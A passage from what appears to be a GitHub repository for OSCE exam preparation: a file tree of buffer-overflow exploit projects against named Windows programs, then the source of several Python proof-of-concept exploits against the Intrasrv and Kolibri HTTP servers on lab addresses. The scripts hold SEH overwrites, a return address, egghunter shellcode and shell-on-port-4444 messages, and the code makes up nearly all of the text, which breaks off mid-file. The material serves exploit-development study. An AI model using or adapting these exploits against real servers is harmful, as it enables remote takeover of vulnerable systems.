├── .DS_Store ├── BoF ├── Egg Hunter BoF │ ├── coolplayer-40151 │ │ ├── 40151.py │ │ └── evil.m3u │ ├── eureka-10235 │ │ ├── eureka_crash.pl │ │ ├── eureka_huntertest.pl │ │ ├── eureka_public_bind_shell.py │ │ ├── eureka_public_meterp_rev_shell.py │ │ └── eureka_shellcode.pl │ ├── intrasrv-25836 │ │ ├── 1st │ │ │ ├── intra_crash.py │ │ │ ├── intra_egghunt.py │ │ │ ├── intra_eip.py │ │ │ ├── intra_jmp_back.py │ │ │ ├── intra_pattern.py │ │ │ ├── intra_poc.py │ │ │ ├── intra_ppr.py │ │ │ └── intrabind.py │ │ └── 2nd │ │ │ ├── backjump.py │ │ │ ├── bind.py │ │ │ ├── crash.py │ │ │ ├── egghunt.py │ │ │ ├── intrasrv.spk │ │ │ ├── pattern.py │ │ │ └── ppr.py │ ├── kolibri-34059 │ │ └── 34059poc.py │ ├── kolibri-fuzzy-15834 │ │ ├── 1st time │ │ │ ├── kol1.py │ │ │ ├── kol2.py │ │ │ ├── kol3.py │ │ │ ├── kol4.py │ │ │ ├── kol5.py │ │ │ ├── kol6.py │ │ │ └── kol7.py │ │ ├── 2nd time │ │ │ ├── kolibri_crash.py │ │ │ ├── kolibri_eip_b.py │ │ │ ├── kolibri_eip_crash.py │ │ │ ├── kolibri_eip_jmp_esp.py │ │ │ ├── kolibri_eip_jmp_esp_b33f_jmp.py │ │ │ ├── kolibri_eip_jmp_esp_b33f_stage2_eip.py │ │ │ ├── kolibri_eip_jmp_esp_jmp_2.py │ │ │ └── kolibri_eip_shellcode_gameover.py │ │ ├── 3rd time │ │ │ ├── kol_crash.py │ │ │ ├── kol_crash_b.py │ │ │ ├── kol_crash_eip.py │ │ │ ├── kol_crash_eip_jmp_esp.py │ │ │ ├── kol_crash_jmp_back_60.py │ │ │ ├── kol_hunter_jmp_back_60.py │ │ │ ├── kol_hunter_stage2_pattcreate.py │ │ │ └── kol_shellcode_bind.py │ │ ├── 4th time │ │ │ ├── kol_crash.py │ │ │ ├── kol_crash_eip.py │ │ │ ├── kol_crash_eip_b.py │ │ │ ├── kol_eip_overwrite_jmp_esp.py │ │ │ ├── kol_hunter.py │ │ │ ├── kol_jmp_back.py │ │ │ ├── kol_shellcode_bind.py │ │ │ └── kol_stage2_eip_cyclic.py │ │ ├── 5th time │ │ │ ├── kol_crash.py │ │ │ ├── kol_crash_EIP_Push_ESP.py │ │ │ ├── kol_crash_add_hunter_and_jmp_back_60.py │ │ │ ├── kol_crash_cyclic_pattern.py │ │ │ ├── kol_crash_cyclic_pattern_confirm_bs.py │ │ │ ├── kol_shellcode_gameover.py │ │ │ └── kol_stage2_test_user-agent_cyclic_pattern.py │ │ ├── 6th time │ │ │ ├── kol_crash.py │ │ │ ├── kol_crash_eip_crash.py │ │ │ ├── kol_crash_eip_crash_b's.py │ │ │ ├── kol_crash_hunter_plus_stage2.py │ │ │ ├── kol_crash_jmp_back_60.py │ │ │ ├── kol_crash_jmp_esp.py │ │ │ └── kol_shellcode_gameover.py │ │ └── 7th time │ │ │ ├── kol_crash.py │ │ │ ├── kol_crash_eip_crash_b.py │ │ │ ├── kol_crash_hunter_plus_stage2.py │ │ │ ├── kol_crash_jmp_back_60.py │ │ │ ├── kol_crash_jmp_esp.py │ │ │ ├── kol_pattern.py │ │ │ └── kol_shellcode_gameover.py │ ├── minishare-15575 │ │ ├── bind.py │ │ ├── bs.py │ │ ├── crash.py │ │ ├── pattern.py │ │ └── users.txt │ ├── savant_3.1_10434 │ │ ├── savant_10434_carr_rocx.py │ │ ├── savant_10434_crash_a.py │ │ ├── savant_10434_crash_b.py │ │ ├── savant_10434_crash_b_00.py │ │ ├── savant_10434_crash_conditional_jump.py │ │ ├── savant_10434_crash_eip.py │ │ ├── savant_10434_crash_eip_overwrite.py │ │ ├── savant_10434_crash_eip_overwrite_short_25_jump.py │ │ ├── savant_10434_egghunter_1.py │ │ ├── savant_10434_egghunter_shellcode_bind.py │ │ ├── savant_10434_jmp_instructions.py │ │ └── savant_pub_exploit_10434.py │ ├── savant_3.1_18401 │ │ ├── savant_18401_crash.py │ │ ├── savant_18401_crash_cyclic.py │ │ ├── savant_18401_crash_cyclic_jmp_esp.py │ │ ├── savant_18401_crash_cyclic_withb.py │ │ ├── savant_18401_hunter.py │ │ ├── savant_18401_jmp_around.py │ │ ├── savant_18401_shellcode_bind.py │ │ ├── savant_18401_shellcode_reverse.py │ │ └── savant_18401_short_jmp.py │ └── xitami-17361 │ │ ├── 1st │ │ ├── xitami_crash.py │ │ ├── xitami_egghunt.py │ │ ├── xitami_eip.py │ │ ├── xitami_jmp.py │ │ ├── xitami_pattern.py │ │ ├── xitami_poc.py │ │ ├── xitami_ppr.py │ │ └── xitami_shellcode.py │ │ └── 2nd │ │ ├── b.py │ │ ├── back.py │ │ ├── crash.py │ │ ├── egghunt.py │ │ ├── jmpesp.py │ │ ├── pattern.py │ │ ├── shellcode.py │ │ └── xitami.spk ├── SEH-BoF │ ├── windows_7_sp1_x64 │ │ └── konica_ftp_server │ │ │ ├── konica_exploit_badchar_testing.py │ │ │ └── konica_exploit_shellcode_reverse.py │ ├── windows_xp_sp2 │ │ ├── ikeview_r60_seh │ │ │ ├── ikeview_r60_eip_crash.py │ │ │ ├── ikeview_r60_shellcode_bind.py │ │ │ ├── key.elg │ │ │ └── test.py │ │ └── mooplayer_1.3.0 │ │ │ ├── MooPlayer_crash.m3u │ │ │ ├── MooPlayer_eip_crash.m3u │ │ │ ├── MooPlayer_messagebox.m3u │ │ │ ├── mooplayer_1.3.0_crash.pl │ │ │ ├── mooplayer_1.3.0_eip_crash.pl │ │ │ └── mooplayer_1.3.0_pub_exploit.pl │ └── windows_xp_sp3 │ │ ├── audiocoder │ │ ├── audiocoder.m3u │ │ └── audiocoder_crash.pl │ │ ├── coolplayer+ v2.19.4 │ │ ├── add(reg)+jmp │ │ │ ├── coolplayer_beginning_buffer.pl │ │ │ ├── coolplayer_eip_takeover.pl │ │ │ ├── coolplayer_eip_takeover_1.pl │ │ │ ├── coolplayer_fuzz.pl │ │ │ ├── coolplayer_fuzz1.pl │ │ │ ├── coolplayer_jmp_ebx.pl │ │ │ ├── coolplayer_shellcode_attempt.pl │ │ │ ├── coolplayer_shellcode_calc.pl │ │ │ ├── coolplayer_shellcode_meterp.pl │ │ │ ├── coolplayerbegbuffer.m3u │ │ │ ├── coolplayercrash.m3u │ │ │ ├── coolplayercrash1.m3u │ │ │ ├── coolplayereiptakeover.m3u │ │ │ ├── coolplayereiptakeover1.m3u │ │ │ ├── coolplayerjmpebx.m3u │ │ │ ├── coolplayershell_meterp.m3u │ │ │ ├── coolplayershellcode_att.m3u │ │ │ └── coolplayershellcodecalc.m3u │ │ ├── pop+ret │ │ │ ├── coolplayer_popret_aadmin.m3u │ │ │ ├── coolplayer_popret_addmin.pl │ │ │ ├── coolplayer_popret_find.m3u │ │ │ └── coolplayer_popret_find.pl │ │ ├── popad │ │ │ ├── coolplayer_popad.m3u │ │ │ ├── coolplayer_popad.pl │ │ │ ├── coolplayer_popad2.m3u │ │ │ └── coolplayer_popad2.pl │ │ ├── push(reg)+ret │ │ │ ├── coolplayer_shellcode_pushregret_calc.pl │ │ │ └── coolplayer_shellcode_subregjump_calc.m3u │ │ ├── shortjump │ │ │ ├── coolplayer_shortjump.m3u │ │ │ └── coolplayer_shortjump.pl │ │ └── sub(reg)+jmp │ │ │ ├── coolplayer_shellcode_subregjump_calc.pl │ │ │ └── coolplayershell_subregjump_calc.m3u │ │ ├── dvdxplayer │ │ ├── dvdxplayer_crash.plf │ │ ├── dvdxplayer_crash.py │ │ ├── dvdxplayer_patt_nSEH.py │ │ ├── dvdxplayer_patt_nSEH_SEH.py │ │ ├── dvdxplayer_patt_overwrite.plf │ │ ├── dvdxplayer_patt_overwrite.py │ │ └── dvdxplayer_patt_shellcode.py │ │ ├── easychatserver │ │ ├── easychatserver_eip_fuzz.py │ │ ├── easychatserver_fuzz.py │ │ ├── easychatserver_fuzz2.py │ │ ├── easychatserver_overwrite_SEH.py │ │ ├── easychatserver_shellcode.py │ │ └── easychatserver_shortjump.py │ │ ├── easyfilesharing_webserver │ │ ├── easyfilesharing_crash_eip.py │ │ ├── easyfilesharing_shellcode_calc_get.py │ │ └── easyfilesharing_shellcode_calc_head.py │ │ ├── mediacoder_0.8.43.5830 │ │ ├── foo.m3u │ │ ├── mediacoder_b_takeover.py │ │ ├── mediacoder_crash.py │ │ ├── mediacoder_eip_crash.py │ │ └── mediacoder_shellcode_calc.py │ │ ├── millenium_mp3 │ │ ├── c0d3r.mpf │ │ ├── millenium_crash.pl │ │ ├── millenium_eip_b_crash.pl │ │ ├── millenium_eip_crash.pl │ │ ├── millenium_popx2ret_confirm_location_crash.pl │ │ ├── millenium_popx2ret_crash.pl │ │ ├── millenium_popx2ret_smalljump.pl │ │ └── millenium_shellcode.pl │ │ ├── not_completed │ │ ├── easyrmtomp3 │ │ │ └── corelantutpart-2 │ │ │ │ ├── easymp3-ss-overwrite-eip.pl │ │ │ │ └── test1.m3u │ │ └── fuzzysec3 │ │ │ └── div1.py │ │ ├── soritong_mp3_player_1.0 │ │ ├── sori_crash.pl │ │ ├── sori_offset.pl │ │ ├── sori_shellcode_SEH.pl │ │ └── ui.txt │ │ ├── tomabo_mp4_player │ │ ├── tomabo_SEH_nseh_overwrite.m3u │ │ ├── tomabo_SEH_nseh_overwrite.py │ │ ├── tomabo_SEH_nseh_ppr_badchars.m3u │ │ ├── tomabo_SEH_nseh_ppr_badchars.py │ │ ├── tomabo_eip_crash.m3u │ │ ├── tomabo_eip_crash.py │ │ ├── tomabo_shellcode_meterp_reverse.py │ │ └── whatever.m3u │ │ └── total_video_player │ │ ├── Settings.ini │ │ ├── pub_exploit.pl │ │ ├── total_vid_player_calc_shellcode.pl │ │ └── total_vid_player_eip_overwrite.pl └── Vanilla-EIP-Overwrite-BoF │ └── windows_xp_sp3 │ ├── Ability_FTP_Server │ ├── 3afs2.24.py │ ├── 4afs2.24.py │ ├── 5afs2.24.py │ ├── ability_ftp_server_eip1.py │ ├── ability_ftp_server_eip2.py │ ├── ability_ftp_server_fuzz.py │ ├── ability_ftp_server_sc.py │ ├── afs2.2.24.py │ └── afs2.34-1.py │ ├── AviosoftDTVPlayerPro │ ├── avisfot_eip_crash.plf │ ├── avisoft_badchars.plf │ ├── avisoft_badchars.py │ ├── avisoft_crash.py │ ├── avisoft_eip_b_crash.plf │ ├── avisoft_eip_b_crash.py │ ├── avisoft_eip_crash.py │ ├── avisoft_shellcode_1.plf │ └── avisoft_shellcode_1.py │ ├── BlazeDVDProfessional │ ├── badchars.txt │ ├── blazeexploit.zip │ ├── dvd_crash.plf │ ├── dvd_crash.py │ ├── dvd_eip_b_overwrite.plf │ ├── dvd_eip_b_overwrite.py │ ├── dvd_eip_badchars.plf │ ├── dvd_eip_badchars.py │ ├── dvd_eip_overwrite.plf │ ├── dvd_eip_overwrite.py │ ├── dvd_shellcode_attempt1.plf │ ├── dvd_shellcode_attempt1.py │ ├── dvd_shellcode_attempt2.plf │ ├── dvd_shellcode_attempt2.py │ ├── dvd_shellcode_attempt3.plf │ └── dvd_shellcode_attempt3.py │ ├── EasyMP3Converter │ ├── easymp3-ss-crash.pl │ ├── easymp3-ss-determine-eip-offset.pl │ ├── easymp3-ss-determine-eip.pl │ ├── easymp3-ss-overwrite-eip-jmp-esp.pl │ ├── easymp3-ss-overwrite-eip.pl │ └── easymp3-ss-sc.pl │ ├── Echo_Server │ ├── echo_server │ │ ├── echo_server_eip_overwrite.py │ │ ├── echo_server_fuzz.py │ │ └── echo_server_shellcode.py │ ├── echo_server_3 │ │ ├── badchars.txt │ │ ├── echo_server_eip_overwrite.py │ │ ├── echo_server_fuzz.py │ │ └── echo_server_shellcode.py │ └── echo_server_4 │ │ ├── echo_server_badchars1.py │ │ ├── echo_server_eip_overwrite.py │ │ ├── echo_server_fuzz.py │ │ └── echo_server_shellcode.py │ ├── FreeSSH │ ├── freessh_badchars.py │ ├── freessh_crash.py │ ├── freessh_eip_b_crash.py │ ├── freessh_eip_crash.py │ └── freessh_shellcode_1.py │ ├── Freefloat_FTP_Server │ ├── freefloat_ftp_server_eip1.py │ ├── freefloat_ftp_server_eip2.py │ ├── freefloat_ftp_server_fuzz.py │ └── freefloat_ftp_server_sc.py │ ├── MicroP │ ├── MicroP.exe │ ├── exploit_crash.mppl │ ├── exploit_eip_b_overwrite.mppl │ ├── exploit_eip_badchars1.mppl │ ├── exploit_eip_badchars2.mppl │ ├── exploit_eip_badchars3.mppl │ ├── exploit_eip_badchars4.mppl │ ├── exploit_eip_overwrite.mppl │ ├── exploit_shellcode_attempt1.mppl │ ├── exploit_shellcode_attempt2.mppl │ ├── exploit_shellcode_attempt3.mppl │ ├── exploit_shellcode_attempt4.mppl │ ├── microp_crash.py │ ├── microp_eip_b_overwrite.py │ ├── microp_eip_badchars1.py │ ├── microp_eip_badchars2.py │ ├── microp_eip_badchars3.py │ ├── microp_eip_badchars4.py │ ├── microp_eip_overwrite.py │ ├── microp_shellcode_attempt1.py │ ├── microp_shellcode_attempt2.py │ ├── microp_shellcode_attempt3.py │ └── microp_shellcode_attempt4.py │ ├── Minishare_1.4.1_HTTP_Server │ ├── minishare_1.4.1_http_eip1.py │ ├── minishare_1.4.1_http_eip2.py │ ├── minishare_1.4.1_http_fuzz.py │ └── minishare_1.4.1_http_sc.py │ ├── PCman_FTP_Server │ ├── pcman_ftp_server_eip1.py │ ├── pcman_ftp_server_eip2.py │ ├── pcman_ftp_server_fuzz.py │ └── pcman_ftp_server_sc.py │ ├── Ultramini_HTTP_Server │ ├── ultramini_http_server_eip1.py │ ├── ultramini_http_server_eip2.py │ ├── ultramini_http_server_fuzz.py │ ├── ultramini_http_server_sc.py │ └── umhttp3.py │ └── War-FTP_Server │ ├── war-ftpd-b-crash.py │ ├── war-ftpd-badchars.py │ ├── war-ftpd-crash.py │ ├── war-ftpd-eip_crash.py │ └── war-ftpd-shellcode_meterpreter.py └── README.md /.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/.DS_Store -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/coolplayer-40151/evil.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Egg Hunter BoF/coolplayer-40151/evil.m3u -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/intrasrv-25836/1st/intra_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | target="192.168.37.131" 8 | crash = "A"*4000 9 | shellcode = "B" * 4000 10 | 11 | buffer="GET / HTTP/1.1\r\n" 12 | buffer+="Host: " + crash + "\r\n" 13 | buffer+="Content-Type: application/x-www-form-urlencoded\r\n" 14 | buffer+="User-Agent: Mozilla/4.0 (Windows XP 5.1)\r\n" 15 | buffer+="Content-Length: 1048580\r\n\r\n" 16 | buffer+=shellcode 17 | 18 | one = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) 19 | one.connect((target, 80)) 20 | one.send(buffer) 21 | one.close() 22 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/intrasrv-25836/1st/intra_egghunt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | target="192.168.37.131" 8 | 9 | egghunter="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + "\x90"*94 10 | 11 | nseh="\xEB\x80\x90\x90" #jmp back do egghunter 12 | seh="\xdd\x97\x40\x00" #0x004097dd, # pop eax # pop ebp # ret - intrasrv.exe 13 | crash = "\x90"*1427 + egghunter + nseh + seh + "B" *500 14 | shellcode = "T00WT00W" + "C"*500 15 | 16 | buffer="GET / HTTP/1.1\r\n" 17 | buffer+="Host: " + crash + "\r\n" 18 | buffer+="Content-Type: application/x-www-form-urlencoded\r\n" 19 | buffer+="User-Agent: Mozilla/4.0 (Windows XP 5.1)\r\n" 20 | buffer+="Content-Length: 1048580\r\n\r\n" 21 | buffer+= shellcode 22 | 23 | one = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) 24 | one.connect((target, 80)) 25 | one.send(buffer) 26 | one.close() 27 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/intrasrv-25836/1st/intra_eip.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | target="192.168.1.169" 8 | crash = "\x90"*1553 + "B"*4 + "C"*1500 9 | shellcode = "\x90"*1500 10 | 11 | buffer="GET / HTTP/1.1\r\n" 12 | buffer+="Host: " + crash + "\r\n" 13 | buffer+="Content-Type: application/x-www-form-urlencoded\r\n" 14 | buffer+="User-Agent: Mozilla/4.0 (Windows XP 5.1)\r\n" 15 | buffer+="Content-Length: 1048580\r\n\r\n" 16 | buffer+= shellcode 17 | 18 | one = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) 19 | one.connect((target, 80)) 20 | one.send(buffer) 21 | one.close() -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/intrasrv-25836/1st/intra_jmp_back.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | target="192.168.37.131" 8 | 9 | nseh="\xEB\x80\x90\x90"#jmp back do egghunter 10 | 11 | seh="\xdd\x97\x40\x00" #0x004097dd, # pop eax # pop ebp # ret - intrasrv.exe 12 | 13 | crash = "\x90"*1549 + nseh + seh + "B"*500 14 | 15 | shellcode = "C"*500 16 | 17 | buffer="GET / HTTP/1.1\r\n" 18 | buffer+="Host: " + crash + "\r\n" 19 | buffer+="Content-Type: application/x-www-form-urlencoded\r\n" 20 | buffer+="User-Agent: Mozilla/4.0 (Windows XP 5.1)\r\n" 21 | buffer+="Content-Length: 1048580\r\n\r\n" 22 | buffer+= shellcode 23 | 24 | one = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) 25 | one.connect((target, 80)) 26 | one.send(buffer) 27 | one.close() 28 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/intrasrv-25836/1st/intra_ppr.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | target="192.168.37.131" 8 | 9 | seh="\xdd\x97\x40\x00" #0x004097dd, # pop eax # pop ebp # ret - intrasrv.exe 10 | crash = "\x90"*1553 + seh + "B" * 1500 11 | shellcode = "A"*2500 12 | 13 | buffer="GET / HTTP/1.1\r\n" 14 | buffer+="Host: " + crash + "\r\n" 15 | buffer+="Content-Type: application/x-www-form-urlencoded\r\n" 16 | buffer+="User-Agent: Mozilla/4.0 (Windows XP 5.1)\r\n" 17 | buffer+="Content-Length: 1048580\r\n\r\n" 18 | buffer+= shellcode 19 | 20 | one = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) 21 | one.connect((target, 80)) 22 | one.send(buffer) 23 | one.close() 24 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/intrasrv-25836/2nd/backjump.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import time 4 | import sys 5 | 6 | banner = """ 7 | #----------------------------------------------# 8 | Intrasrv Exploit - Egghunter 9 | #----------------------------------------------# 10 | """ 11 | 12 | if len(sys.argv) != 3: 13 | print "Usage: ./intrasrv.py " 14 | sys.exit(1) 15 | 16 | target = sys.argv[1] 17 | port = int(sys.argv[2]) 18 | 19 | nseh = "\xeb\xc4\x90\x90" 20 | seh = "\xdd\x97\x40\x00" #0x004097dd, # pop eax # pop ebp # ret - intrasrv.exe 21 | buf = "\x90"*1553 + nseh + seh + "B" * 1500 22 | shellcode = "B" * 1000 23 | 24 | header = ( 25 | 'GET / HTTP/1.1\r\n' 26 | 'Host: %s \r\n' 27 | 'Content-Type: application/x-www-form-urlencoded\r\n' 28 | 'User-Agent: Mozilla/4.0 (Windows XP 5.1)\r\n' 29 | 'Content-Length: 1048580\r\n\r\n %s') % (buf, shellcode) 30 | 31 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 32 | 33 | try: 34 | s.connect((target, port)) 35 | print "[+] Connected" 36 | except: 37 | print "[!] Connection Failed" 38 | sys.exit(0) 39 | 40 | print "[+] Sending payload..." 41 | s.send(header) 42 | time.sleep(1) 43 | s.close() 44 | 45 | print "[+] Check port 4444 for your shell" 46 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/intrasrv-25836/2nd/crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import time 4 | import sys 5 | 6 | banner = """ 7 | #----------------------------------------------# 8 | Intrasrv Exploit - Egghunter 9 | #----------------------------------------------# 10 | """ 11 | 12 | if len(sys.argv) != 3: 13 | print "Usage: ./intrasrv.py " 14 | sys.exit(1) 15 | 16 | target = sys.argv[1] 17 | port = int(sys.argv[2]) 18 | 19 | buf = "A" * 4000 20 | shellcode = "B" * 1000 21 | 22 | header = ( 23 | 'GET / HTTP/1.1\r\n' 24 | 'Host: %s \r\n' 25 | 'Content-Type: application/x-www-form-urlencoded\r\n' 26 | 'User-Agent: Mozilla/4.0 (Windows XP 5.1)\r\n' 27 | 'Content-Length: 1048580\r\n\r\n %s') % (buf, shellcode) 28 | 29 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 30 | 31 | try: 32 | s.connect((target, port)) 33 | print "[+] Connected" 34 | except: 35 | print "[!] Connection Failed" 36 | sys.exit(0) 37 | 38 | print "[+] Sending payload..." 39 | s.send(header) 40 | time.sleep(1) 41 | s.close() 42 | 43 | print "[+] Check port 4444 for your shell" 44 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/intrasrv-25836/2nd/egghunt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import time 4 | import sys 5 | 6 | banner = """ 7 | #----------------------------------------------# 8 | Intrasrv Exploit - Egghunter 9 | #----------------------------------------------# 10 | """ 11 | 12 | if len(sys.argv) != 3: 13 | print "Usage: ./intrasrv.py " 14 | sys.exit(1) 15 | 16 | target = sys.argv[1] 17 | port = int(sys.argv[2]) 18 | 19 | egghunt = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 20 | nseh = "\xeb\xc4\x90\x90" 21 | seh = "\xdd\x97\x40\x00" #0x004097dd, # pop eax # pop ebp # ret - intrasrv.exe 22 | buf = "\x90"*1521 + egghunt + nseh + seh + "B" * 500 23 | shellcode = "T00WT00W" + "C" * 500 24 | 25 | header = ( 26 | 'GET / HTTP/1.1\r\n' 27 | 'Host: %s \r\n' 28 | 'Content-Type: application/x-www-form-urlencoded\r\n' 29 | 'User-Agent: Mozilla/4.0 (Windows XP 5.1)\r\n' 30 | 'Content-Length: 1048580\r\n\r\n %s') % (buf, shellcode) 31 | 32 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 33 | 34 | try: 35 | s.connect((target, port)) 36 | print "[+] Connected" 37 | except: 38 | print "[!] Connection Failed" 39 | sys.exit(0) 40 | 41 | print "[+] Sending payload..." 42 | s.send(header) 43 | time.sleep(1) 44 | s.close() 45 | 46 | print "[+] Check port 4444 for your shell" 47 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/intrasrv-25836/2nd/intrasrv.spk: -------------------------------------------------------------------------------- 1 | s_string("GET"); 2 | s_string(" "); 3 | s_string("/ "); 4 | s_string("HTTP/1.1"); 5 | s_string("\r\n"); 6 | s_string_variable("Host: "); 7 | s_string("192.168.37.131"); 8 | s_string("\r\n"); 9 | s_string("Content-Type: "); 10 | s_string("application/x-www-form-urlencoded\r\n"); 11 | s_string("User-Agent: Mozilla/4.0 (Windows XP 5.1)\r\n" 12 | s_string_variable("Content-Length: 1048580\r\n\r\n"); 13 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/intrasrv-25836/2nd/ppr.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import time 4 | import sys 5 | 6 | banner = """ 7 | #----------------------------------------------# 8 | Intrasrv Exploit - Egghunter 9 | #----------------------------------------------# 10 | """ 11 | 12 | if len(sys.argv) != 3: 13 | print "Usage: ./intrasrv.py " 14 | sys.exit(1) 15 | 16 | target = sys.argv[1] 17 | port = int(sys.argv[2]) 18 | 19 | seh = "\xdd\x97\x40\x00" #0x004097dd, # pop eax # pop ebp # ret - intrasrv.exe 20 | buf = "\x90"*1557 + seh + "B" * 1500 21 | shellcode = "B" * 1000 22 | 23 | header = ( 24 | 'GET / HTTP/1.1\r\n' 25 | 'Host: %s \r\n' 26 | 'Content-Type: application/x-www-form-urlencoded\r\n' 27 | 'User-Agent: Mozilla/4.0 (Windows XP 5.1)\r\n' 28 | 'Content-Length: 1048580\r\n\r\n %s') % (buf, shellcode) 29 | 30 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 31 | 32 | try: 33 | s.connect((target, port)) 34 | print "[+] Connected" 35 | except: 36 | print "[!] Connection Failed" 37 | sys.exit(0) 38 | 39 | print "[+] Sending payload..." 40 | s.send(header) 41 | time.sleep(1) 42 | s.close() 43 | 44 | print "[+] Check port 4444 for your shell" 45 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/1st time/kol1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | Stagel = "A" * 600 8 | 9 | buffer = ( 10 | "HEAD /" + Stagel + " HTTP/1.1\r\n" 11 | "Host: 192.168.201.140:8080\r\n" 12 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 13 | "Keep-Alive: 115\r\n" 14 | "Connection: keep-alive\r\n\r\n") 15 | 16 | exp1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | exp1.connect(("192.168.201.140", 8080)) 18 | exp1.send(buffer) 19 | exp1.close() 20 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/1st time/kol2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | Stage1 = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9" 8 | 9 | buffer = ( 10 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 11 | "Host: 192.168.201.140:8080\r\n" 12 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 13 | "Keep-Alive: 115\r\n" 14 | "Connection: keep-alive\r\n\r\n") 15 | 16 | exp1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | exp1.connect(("192.168.201.140", 8080)) 18 | exp1.send(buffer) 19 | exp1.close() 20 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/1st time/kol3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | Stage1 = "A"*515 + "\x59\x54\xC3\x77" + "B"*2 8 | 9 | buffer = ( 10 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 11 | "Host: 192.168.201.140:8080\r\n" 12 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 13 | "Keep-Alive: 115\r\n" 14 | "Connection: keep-alive\r\n\r\n") 15 | 16 | exp1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | exp1.connect(("192.168.201.140", 8080)) 18 | exp1.send(buffer) 19 | exp1.close() 20 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/1st time/kol4.py: -------------------------------------------------------------------------------- 1 